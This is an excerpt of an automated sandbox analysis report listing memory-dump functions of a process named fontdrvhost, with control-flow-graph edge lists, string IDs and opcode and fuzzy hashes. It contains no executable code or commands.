                                                                    • Instruction ID: 5d56ad453f1af1ef644d2228017561de20c2bbdc2ec4eb7f7683066003e3dc2b
                                                                    • Opcode Fuzzy Hash: f579f6c6d0dd53790c3022d843e050274251bae2224785f2adda810b7600d180
                                                                    • Instruction Fuzzy Hash: 79D1C33461954A8FEB68DF58C0E06B577A1FF45304B5546BDC84BCB69BCA38F982CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCCEFF Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 994 7ffd9bbcceff-7ffd9bbccf08 995 7ffd9bbccf0e-7ffd9bbccf1f 994->995 996 7ffd9bbcd23f-7ffd9bbcd280 994->996 997 7ffd9bbccf35-7ffd9bbccf3c 995->997 998 7ffd9bbccf21-7ffd9bbccf25 995->998 1012 7ffd9bbcd28b-7ffd9bbcd321 996->1012 1001 7ffd9bbccef4-7ffd9bbcd235 997->1001 1002 7ffd9bbccf3e-7ffd9bbccf54 997->1002 998->996 1000 7ffd9bbccf2b-7ffd9bbccf33 998->1000 1000->997 1001->996 1005 7ffd9bbccf5a-7ffd9bbccf62 1002->1005 1006 7ffd9bbccfe4-7ffd9bbcd014 1002->1006 1005->996 1009 7ffd9bbccf68-7ffd9bbccf7a 1005->1009 1016 7ffd9bbcd01a-7ffd9bbcd01b 1006->1016 1017 7ffd9bbcd0be-7ffd9bbcd0c7 1006->1017 1009->996 1010 7ffd9bbccf80-7ffd9bbccf97 1009->1010 1013 7ffd9bbccf99-7ffd9bbccfa0 1010->1013 1014 7ffd9bbccfd7-7ffd9bbccfde 1010->1014 1026 7ffd9bbcd32c-7ffd9bbcd32d 1012->1026 1027 7ffd9bbcd2a6-7ffd9bbcd326 1012->1027 1013->996 1015 7ffd9bbccfa6-7ffd9bbccfd4 1013->1015 1014->1005 1014->1006 1015->1014 1020 7ffd9bbcd01e-7ffd9bbcd034 1016->1020 1021 7ffd9bbcd0cd-7ffd9bbcd0d3 1017->1021 1022 7ffd9bbcd1ff-7ffd9bbcd20d 1017->1022 1020->996 1028 7ffd9bbcd03a-7ffd9bbcd05e 1020->1028 1021->996 1023 7ffd9bbcd0d9-7ffd9bbcd0e8 1021->1023 1024 7ffd9bbcd214-7ffd9bbcd225 1022->1024 1025 7ffd9bbcd20f 1022->1025 1029 7ffd9bbcd1f2-7ffd9bbcd1f9 1023->1029 1030 7ffd9bbcd0ee-7ffd9bbcd0f5 1023->1030 1025->1024 1039 7ffd9bbcd2ee-7ffd9bbcd301 1026->1039 1040 7ffd9bbcd32f-7ffd9bbcd36f 1026->1040 1027->1026 1041 7ffd9bbcd2c8-7ffd9bbcd328 1027->1041 1032 7ffd9bbcd0b1-7ffd9bbcd0b8 1028->1032 1033 7ffd9bbcd060-7ffd9bbcd083 call 7ffd9bbc9200 1028->1033 1029->1021 1029->1022 1030->996 1035 7ffd9bbcd0fb-7ffd9bbcd107 call 7ffd9bbc9200 1030->1035 1032->1017 1032->1020 1033->996 1046 7ffd9bbcd089-7ffd9bbcd0af 1033->1046 1043 7ffd9bbcd10c-7ffd9bbcd117 1035->1043 1047 7ffd9bbcd32a 1039->1047 1052 7ffd9bbcd371-7ffd9bbcd3c6 1040->1052 1041->1047 1049 7ffd9bbcd2df-7ffd9bbcd2ea 1041->1049 1050 7ffd9bbcd119-7ffd9bbcd130 1043->1050 1051 7ffd9bbcd156-7ffd9bbcd165 1043->1051 1046->1032 1046->1033 1048 7ffd9bbcd303-7ffd9bbcd30b 1047->1048 1048->1026 1057 7ffd9bbcd30d-7ffd9bbcd320 1048->1057 1049->1026 1056 7ffd9bbcd2ec-7ffd9bbcd301 1049->1056 1050->996 1053 7ffd9bbcd136-7ffd9bbcd152 1050->1053 1051->996 1055 7ffd9bbcd16b-7ffd9bbcd18f 1051->1055 1066 7ffd9bbcd3d1-7ffd9bbcd477 1052->1066 1053->1050 1058 7ffd9bbcd154 1053->1058 1059 7ffd9bbcd192-7ffd9bbcd1af 1055->1059 1056->1047 1056->1048 1060 7ffd9bbcd1d2-7ffd9bbcd1e8 1058->1060 1059->996 1062 7ffd9bbcd1b5-7ffd9bbcd1d0 1059->1062 1060->996 1064 7ffd9bbcd1ea-7ffd9bbcd1ee 1060->1064 1062->1059 1062->1060 1064->1029 1078 7ffd9bbcd5a7-7ffd9bbcd5c4 1066->1078 1079 7ffd9bbcd47d-7ffd9bbcd820 1066->1079 1081 7ffd9bbcd5ca-7ffd9bbcd5cf 1078->1081 1082 7ffd9bbcd8d1-7ffd9bbcdaa8 1078->1082 1087 7ffd9bbcd88e-7ffd9bbcd8a8 1079->1087 1083 7ffd9bbcd5d2-7ffd9bbcd5d9 1081->1083 1085 7ffd9bbcd5db-7ffd9bbcd5df 1083->1085 1086 7ffd9bbcd55c-7ffd9bbcd8c9 1083->1086 1085->1052 1090 7ffd9bbcd5e5 1085->1090 1086->1082 1092 7ffd9bbcd663-7ffd9bbcd666 1090->1092 1093 7ffd9bbcd669-7ffd9bbcd670 1092->1093 1094 7ffd9bbcd676 1093->1094 1095 7ffd9bbcd5e7-7ffd9bbcd61c call 7ffd9bbcd270 1093->1095 1096 7ffd9bbcd6e6-7ffd9bbcd6ed 1094->1096 1095->1082 1103 7ffd9bbcd622-7ffd9bbcd632 1095->1103 1098 7ffd9bbcd678-7ffd9bbcd6aa call 7ffd9bbcd270 1096->1098 1099 7ffd9bbcd6ef-7ffd9bbcd735 1096->1099 1098->1082 1106 7ffd9bbcd6b0-7ffd9bbcd6d8 1098->1106 1114 7ffd9bbcd73b-7ffd9bbcd740 1099->1114 1115 7ffd9bbcd504-7ffd9bbcd508 1099->1115 1103->1052 1105 7ffd9bbcd638-7ffd9bbcd655 1103->1105 1105->1082 1108 7ffd9bbcd65b-7ffd9bbcd660 1105->1108 1106->1082 1109 7ffd9bbcd6de-7ffd9bbcd6e3 1106->1109 1108->1092 1109->1096 1118 7ffd9bbcd7c6-7ffd9bbcd7ca 1114->1118 1116 7ffd9bbcd55a 1115->1116 1117 7ffd9bbcd50a-7ffd9bbcd527 1115->1117 1116->1083 1117->1087 1119 7ffd9bbcd745-7ffd9bbcd774 call 7ffd9bbcd270 1118->1119 1120 7ffd9bbcd7d0-7ffd9bbcd7d6 1118->1120 1119->1082 1123 7ffd9bbcd77a-7ffd9bbcd78a 1119->1123 1123->1066 1124 7ffd9bbcd790-7ffd9bbcd79f 1123->1124 1124->1082 1125 7ffd9bbcd7a5-7ffd9bbcd7b8 1124->1125 1125->1093 1126 7ffd9bbcd7be-7ffd9bbcd7c3 1125->1126 1126->1118
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k@
                                                                    • API String ID: 0-350512992
                                                                    • Opcode ID: ca370307a954c94519d58f6d4a2c5ff94a9df851b584f8fa48495847243fe028
                                                                    • Instruction ID: 92054b980b0872e42da85cfe1153e13c2e994fc943b18960a2a1ecd785e2716f
                                                                    • Opcode Fuzzy Hash: ca370307a954c94519d58f6d4a2c5ff94a9df851b584f8fa48495847243fe028
                                                                    • Instruction Fuzzy Hash: 2CC1E33061954A8BEB29DF58C0E05B577A1FF45308B5546BDC84B8B6DBCA38F982CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCC792 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1127 7ffd9bbcc792-7ffd9bbcc799 1128 7ffd9bbcc9b5-7ffd9bbcc9c6 1127->1128 1129 7ffd9bbcc79f-7ffd9bbcc7d1 call 7ffd9bbcc530 call 7ffd9bbcc400 1127->1129 1130 7ffd9bbcc9c8 1128->1130 1131 7ffd9bbcc9cd-7ffd9bbcc9d8 1128->1131 1129->1128 1136 7ffd9bbcc7d7-7ffd9bbcc829 call 7ffd9bbcc530 call 7ffd9bbcc400 1129->1136 1130->1131 1136->1128 1143 7ffd9bbcc82f-7ffd9bbcc874 call 7ffd9bbcc530 1136->1143 1149 7ffd9bbcc876-7ffd9bbcc88a call 7ffd9bbcc400 1143->1149 1150 7ffd9bbcc8e4-7ffd9bbcc920 call 7ffd9bbc9078 1143->1150 1149->1128 1156 7ffd9bbcc890-7ffd9bbcc8b3 call 7ffd9bbcc530 1149->1156 1160 7ffd9bbcc959-7ffd9bbcc960 call 7ffd9bbc90e8 1150->1160 1161 7ffd9bbcc8b9-7ffd9bbcc8c9 1156->1161 1162 7ffd9bbcca85-7ffd9bbcca9c 1156->1162 1166 7ffd9bbcc965-7ffd9bbcc96a 1160->1166 1161->1162 1163 7ffd9bbcc8cf-7ffd9bbcc8e2 1161->1163 1167 7ffd9bbcca9e 1162->1167 1168 7ffd9bbcca9f-7ffd9bbccaad 1162->1168 1163->1149 1163->1150 1169 7ffd9bbcc96c-7ffd9bbcc96e 1166->1169 1170 7ffd9bbcc922-7ffd9bbcc942 1166->1170 1167->1168 1172 7ffd9bbccab5 1168->1172 1173 7ffd9bbccaaf 1168->1173 1169->1128 1174 7ffd9bbcc970-7ffd9bbcc973 1169->1174 1170->1162 1171 7ffd9bbcc948-7ffd9bbcc953 1170->1171 1171->1160 1175 7ffd9bbcca3b-7ffd9bbcca4f 1171->1175 1176 7ffd9bbccab9-7ffd9bbccaf8 1172->1176 1177 7ffd9bbccab7 1172->1177 1173->1172 1178 7ffd9bbcc979-7ffd9bbcc994 1174->1178 1179 7ffd9bbcc975 1174->1179 1180 7ffd9bbcca56-7ffd9bbcca61 1175->1180 1181 7ffd9bbcca51 1175->1181 1183 7ffd9bbccaf9 1176->1183 1185 7ffd9bbccafa-7ffd9bbccd3a 1176->1185 1177->1176 1177->1183 1178->1162 1182 7ffd9bbcc99a-7ffd9bbcc9b3 call 7ffd9bbcc400 1178->1182 1179->1178 1181->1180 1182->1128 1189 7ffd9bbcc9d9-7ffd9bbcc9f2 call 7ffd9bbcc530 1182->1189 1183->1185 1189->1162 1193 7ffd9bbcc9f8-7ffd9bbcc9ff 1189->1193 1194 7ffd9bbcca29-7ffd9bbcca31 1193->1194 1195 7ffd9bbcca01-7ffd9bbcca1d 1194->1195 1196 7ffd9bbcca33-7ffd9bbcca39 1194->1196 1195->1162 1197 7ffd9bbcca1f-7ffd9bbcca27 1195->1197 1196->1175 1198 7ffd9bbcca62 1196->1198 1197->1194 1198->1162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \1_H
                                                                    • API String ID: 0-3222431896
                                                                    • Opcode ID: 2c92e7f8f8632a884981930cbd4d2109644e08e99c9c0fc1c7e2713e3e2d2198
                                                                    • Instruction ID: 9ec942af124fd09fb2da5225e509af48232a085de93bd1525425f8a0abe353c4
                                                                    • Opcode Fuzzy Hash: 2c92e7f8f8632a884981930cbd4d2109644e08e99c9c0fc1c7e2713e3e2d2198
                                                                    • Instruction Fuzzy Hash: 27C1C430B09A4A5FE759EB6CC0A06B4B7A1FF68304F55417AD04EC7AD6DB28B951CBC0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D86FA Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1199 7ffd9c0d86fa-7ffd9c0d88fb 1206 7ffd9c0d8906-7ffd9c0d8998 1199->1206 1221 7ffd9c0d896a-7ffd9c0d8979 call 7ffd9c0d899a 1206->1221 1222 7ffd9c0d8940-7ffd9c0d8969 1206->1222 1222->1221
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^
                                                                    • API String ID: 0-2541302950
                                                                    • Opcode ID: a56ab3c0dbcca72e590f43c097e8e578837340ab49578afda2127576d787fd12
                                                                    • Instruction ID: 5705454b9860d528fbd9d6fc25bfca98652b1527ba45f44e2b9926bec57d7ed8
                                                                    • Opcode Fuzzy Hash: a56ab3c0dbcca72e590f43c097e8e578837340ab49578afda2127576d787fd12
                                                                    • Instruction Fuzzy Hash: B931A421B0C75B8FE775DB9484621B8B6F0EF05390F1803B9E08DC21C2EF286805A782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCBCD6 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1270 7ffd9bbcbcd6-7ffd9bbcbd70 1275 7ffd9bbcbd0b-7ffd9bbcbd72 1270->1275 1276 7ffd9bbcbdce-7ffd9bbcbdec 1270->1276 1281 7ffd9bbcbd79-7ffd9bbcbdc7 1275->1281 1282 7ffd9bbcbd15-7ffd9bbcbd17 1275->1282 1276->1281 1281->1276 1282->1281 1283 7ffd9bbcbd19-7ffd9bbcbd1d 1282->1283 1283->1281 1286 7ffd9bbcbd1f-7ffd9bbcbd23 1283->1286 1287 7ffd9bbcbd55-7ffd9bbcbd6f 1286->1287 1288 7ffd9bbcbd25-7ffd9bbcbd2e 1286->1288 1290 7ffd9bbcbd34-7ffd9bbcbd53 1288->1290 1291 7ffd9bbcbdee-7ffd9bbcbf0e 1288->1291 1290->1287 1300 7ffd9bbcbe53-7ffd9bbcbe5b 1291->1300 1301 7ffd9bbcbec2-7ffd9bbcbec5 call 7ffd9bbc9180 1300->1301 1302 7ffd9bbcbe5d-7ffd9bbcbf37 call 7ffd9bbc9178 1300->1302 1306 7ffd9bbcbeca-7ffd9bbcbecc 1301->1306 1321 7ffd9bbcbe84-7ffd9bbcbe97 1302->1321 1306->1300 1308 7ffd9bbcbece-7ffd9bbcbed9 1306->1308 1310 7ffd9bbcbedb-7ffd9bbcbedf 1308->1310 1311 7ffd9bbcbee5-7ffd9bbcbef7 1308->1311 1310->1300 1310->1311 1313 7ffd9bbcbef9 1311->1313 1314 7ffd9bbcbefe-7ffd9bbcbf0d 1311->1314 1313->1314 1321->1301 1322 7ffd9bbcbe99-7ffd9bbcbeab 1321->1322 1323 7ffd9bbcbeb2-7ffd9bbcbec1 1322->1323 1324 7ffd9bbcbead 1322->1324 1324->1323
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K/
                                                                    • API String ID: 0-1550663435
                                                                    • Opcode ID: 6661770a40ba3ff4a68fceb43fb83a61efc7f56a222e2138a2c1e6cdf464d3fa
                                                                    • Instruction ID: 9faaea365bf5237d98a9ef99bad5e9eae7679a2d36bf5d55821973e0b469e685
                                                                    • Opcode Fuzzy Hash: 6661770a40ba3ff4a68fceb43fb83a61efc7f56a222e2138a2c1e6cdf464d3fa
                                                                    • Instruction Fuzzy Hash: ED81E531A0EA4E8BE738EB6C94751B977E0FF45318B15457ED48EC21D2DE29B902C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DB3F8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: cd462d82f8fadf7de7080eead29c29e8ac00b60a570d3d8f81de8aca6bb0a168
                                                                    • Instruction ID: 629dc2d867d33cded1398535b3dce840cd9f5836a6cba4719dbe1e1e8c8d65f5
                                                                    • Opcode Fuzzy Hash: cd462d82f8fadf7de7080eead29c29e8ac00b60a570d3d8f81de8aca6bb0a168
                                                                    • Instruction Fuzzy Hash: 53514A71E0860A8FDB69DB98C4606BDB7B1EF54341F1042BAE01EEB2D6DB396941DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E0BA2 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: f98396f53d1e93b8f62d0bc9865a148c1e573de2d83b17476a5fa5347c667167
                                                                    • Instruction ID: 1c36f167d937210ae9c5cdc4ee7ff8e4c41aaf9516da8b275bfae7767ee9ee0a
                                                                    • Opcode Fuzzy Hash: f98396f53d1e93b8f62d0bc9865a148c1e573de2d83b17476a5fa5347c667167
                                                                    • Instruction Fuzzy Hash: 4D514931E4860B8FDB69DF98C4A55BDB7B1FF54388F5041BAD01EA7296CB396801DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC6178 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 9447b1e12c7ca689ceef8c5df9acad8c181461de9d9361176fd10d8e7f80ea95
                                                                    • Instruction ID: 84a4304f62ffd5532ad84cfe203ca1fb9c125b709232dc28b4959d0ac54c64ff
                                                                    • Opcode Fuzzy Hash: 9447b1e12c7ca689ceef8c5df9acad8c181461de9d9361176fd10d8e7f80ea95
                                                                    • Instruction Fuzzy Hash: 93514A31E0950E8FDB58EB98C8659BDB7B1FF54305F1140BED41AE72E6CA396A01CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA06761 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA06000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA06000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba06000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: a4da3ef370e5b789b0245ef8702a72624d38bff71e41aa57300dab3265010f7e
                                                                    • Instruction ID: 99697bfce5100a8b9e3365c8019ef667a08aca62844f6153bf86982899817369
                                                                    • Opcode Fuzzy Hash: a4da3ef370e5b789b0245ef8702a72624d38bff71e41aa57300dab3265010f7e
                                                                    • Instruction Fuzzy Hash: DF11F370A1951D8FEBBCDB08C8A4BE8B7B1FB58304F1002F9D04ED2295CA786B818F55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10FAF7 Relevance: .9, Instructions: 852COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 902fbc76a139301a8e3ac18e597168e3af11c60f88d285bf8c55edd550a3d195
                                                                    • Instruction ID: 293149367e47bf10aa77de2c5095f078941939c2684cee05a8deaa409020c56a
                                                                    • Opcode Fuzzy Hash: 902fbc76a139301a8e3ac18e597168e3af11c60f88d285bf8c55edd550a3d195
                                                                    • Instruction Fuzzy Hash: 34725470A4891D8FDFA9EF18C894FA977B1FB68705F1141E9900EE7265DA31AE81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D78B0 Relevance: .7, Instructions: 686COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feb940b1e3eabfa5d8be0192b5eef09affb830d0e0ca8cb18dd9d67ea780a20a
                                                                    • Instruction ID: 356c1adc0d41e5509f8f7e0d50c5978c20e88b63ced5b3ffcde334cd50fa07e0
                                                                    • Opcode Fuzzy Hash: feb940b1e3eabfa5d8be0192b5eef09affb830d0e0ca8cb18dd9d67ea780a20a
                                                                    • Instruction Fuzzy Hash: 75326430A18A1A8FDBA8DB5CC875A7977F1FF58310F5042B9E01EC7296EB25AC45CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DDB99 Relevance: .6, Instructions: 632COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 052ee0f12563d1fcb4cd8bd88171e562ea23c11c9c70ec9d173136084aef7f86
                                                                    • Instruction ID: 6df91fbf0c2ec7ffbf563f7e276cdd8c3b74b48c5dd4c948dd751c8af479454b
                                                                    • Opcode Fuzzy Hash: 052ee0f12563d1fcb4cd8bd88171e562ea23c11c9c70ec9d173136084aef7f86
                                                                    • Instruction Fuzzy Hash: 1C71E722B0C3578AF73676E464655F82FB09F017E0F1A02B7F46E860D7EE1D2845A2D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE005 Relevance: .5, Instructions: 492COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0016f6e91a097346098d28bf41f0e055a51d8d0cf550b1b648fc6d4ffa49442e
                                                                    • Instruction ID: 0ff6a8df31dca3e7e18ae9a912722f368cf84cf5125374cc52306620a22740ce
                                                                    • Opcode Fuzzy Hash: 0016f6e91a097346098d28bf41f0e055a51d8d0cf550b1b648fc6d4ffa49442e
                                                                    • Instruction Fuzzy Hash: D741D412F0C22789F23977E874719F91BA09F007E4F164377F86E4A0C7AE1A2C85A6D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10C866 Relevance: .5, Instructions: 473COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e2986672294a52255c718c63bb29729c4ffba8aac989e5d16d7b8ea3e20604fa
                                                                    • Instruction ID: 124295e079ce15d6a51c731add4d1a1eaba754a3554d3015a3d7791583c62404
                                                                    • Opcode Fuzzy Hash: e2986672294a52255c718c63bb29729c4ffba8aac989e5d16d7b8ea3e20604fa
                                                                    • Instruction Fuzzy Hash: A8F15070A08A8E8FEBB8EF28C865BE937E1FF59351F00412AD84ED7291DB749544CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DC6B1 Relevance: .4, Instructions: 419COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3583f6cb317e1d4d28e4e259ee11f027e8f81c5c7a1b1bdccd75c4cb8f6c4886
                                                                    • Instruction ID: b4dc65455f6e7fd828ad53fbc3e43281c9aef2cad8853bcf287ccba2810c0465
                                                                    • Opcode Fuzzy Hash: 3583f6cb317e1d4d28e4e259ee11f027e8f81c5c7a1b1bdccd75c4cb8f6c4886
                                                                    • Instruction Fuzzy Hash: CAE1AC30A0CB078BE368DB68D4A557577B1FF44394F5446BEE48EC3682EB29B8429B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC7431 Relevance: .4, Instructions: 416COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae01f2b937a838bf4d4c016ee41761d75d0bee1057bb520663f9d26703987ebe
                                                                    • Instruction ID: c7836f79aa06784e59cb2c4952b281c1b4704fbe9be96a1316c879e60cbec276
                                                                    • Opcode Fuzzy Hash: ae01f2b937a838bf4d4c016ee41761d75d0bee1057bb520663f9d26703987ebe
                                                                    • Instruction Fuzzy Hash: 20E1E231A0EA0A8FD369EF6DC4A057577E1FF44318B21457EC49AC36E2DE29B942C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E0E0F Relevance: .4, Instructions: 366COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1050e0100f6c510eb68798f4dbc499880ad3af4557f811a87754257f5d75b95f
                                                                    • Instruction ID: bd5235f44aaa35372a7a92c38b415d149943440a79ecd1fa899780b59274ae42
                                                                    • Opcode Fuzzy Hash: 1050e0100f6c510eb68798f4dbc499880ad3af4557f811a87754257f5d75b95f
                                                                    • Instruction Fuzzy Hash: FBD1AD306585568BEB58CF48C4E06B137B2FF45390B5446BDC85E8B68BCB38E892DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DD0E8 Relevance: .3, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
